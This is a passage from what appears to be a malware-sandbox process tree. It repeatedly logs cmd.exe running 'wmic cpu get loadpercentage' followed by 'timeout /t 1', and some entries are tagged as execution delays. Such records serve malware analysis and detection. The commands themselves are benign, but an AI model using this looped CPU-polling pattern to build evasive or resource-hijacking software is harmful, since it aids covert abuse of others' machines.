    PID:436
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4936
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1812
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1576
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4888
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2188
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4452
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1384
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1648
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2148
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3852
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2044
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1076
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2176
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4768
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3840
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2020
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:692
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1052
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4384
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4484
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3256
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1692
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1968
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:392
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3656
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1412
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2696
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2960
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4548
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4252
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3440
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1768
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1672
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1812
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:968
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2988
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4492
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1984
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4732
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1168
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2032
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5052
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3220
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2772
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3772
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2968
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4768
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4052
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2064
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1052
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2200
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2688
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1684
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1692
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1688
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3996
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3692
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3656
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3164
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5048
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:672
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:820
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3224
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2444
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3808
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1672
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3016
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1812
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4976
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4840
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4888
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3524
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2132
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3700
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4064
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3876
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2636
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2480
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5044
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1076
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2176
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:796
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2128
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2160
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:960
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2620
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1584
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1664
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1116
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1820
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3448
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1968
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3044
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4444
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2436
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3204
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5012
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4128
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4328
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3440
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4912
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4120
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4624
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5008
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:968
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3100
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4840
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5028
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3524
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4500
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1612
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3876
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2804
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2836
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3908
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1076
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2232
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4300
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2176
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1264
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4512
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4784
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:960
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3832
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5076
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2516
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2760
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5096
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1352
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3708
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3996
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3516
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3292
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5048
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3164
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:820
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:316
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:384
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3520
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4912
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5088
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2652
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:224
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1508
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1812
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4224
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2884
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4452
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5036
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1648
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2132
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1468
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4064
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4456
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2480
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4768
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4772
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1928
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1980
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:692
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1680
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1052
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2160
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2200
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1724
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3952
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1684
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1820
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2428
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2212
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3628
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2716
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3692
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1412
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5060
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4328
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1528
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4012
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:384
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3836
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4252
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4120
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:224
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1812
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:872
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3936
